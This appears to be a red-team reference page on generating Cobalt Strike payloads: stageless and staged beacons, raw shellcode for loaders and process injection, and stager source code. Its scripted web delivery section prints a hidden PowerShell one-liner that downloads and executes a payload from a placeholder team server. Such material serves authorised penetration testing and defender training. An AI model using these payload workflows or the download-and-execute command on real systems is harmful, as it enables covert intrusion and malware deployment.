Payload Generation
Generating Cobalt Strike payloads — stageless, staged, shellcode, and scripted web delivery.
Stageless Payload Generation
Generate all stageless payloads at once (recommended after creating listeners):
Payloads > Windows Stageless Generate All Payloads
Save to C:\Payloads for quick access. Generates every format (EXE, DLL, shellcode, PowerShell) for all listeners in x86 and x64.
Individual Stageless Payload
Payloads > Windows Stageless Payload
Options:
- Listener — select target listener
- Output — EXE, Service EXE, DLL, Raw (shellcode), PowerShell
- x64 / x86 — architecture
- Exit Function — process or thread (thread recommended for injection)
Stager Payload Generation
Payloads > Windows Stager Payload
Generates a small stager that fetches the full beacon. Available as EXE, Service EXE, or DLL.
Stager Code Generator
Payloads > Stager Payload Generator
Outputs stager source code in: C, C#, PowerShell, Python, VBA. Useful for building custom loaders or embedding in exploits.
Shellcode Export
Payloads > Windows Stageless Payload > Output: Raw
Exports raw shellcode (.bin) for use in custom loaders, process injection, or encoding pipelines.
See also: Generation & Encoding for XOR encoding and format conversion.
Scripted Web Delivery
Host a payload on the team server for one-liner download-and-execute:
Attacks > Web Drive-by > Scripted Web Delivery
Options:
- URI Path — URL path (e.g.
/a) - Listener — beacon listener to use
- Type — PowerShell, Python, bitsadmin, exe
Generates a one-liner like:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<TEAMSERVER>/a'))"See also: 2. Beacons & Listeners, 4. Evasion & Artifact Kit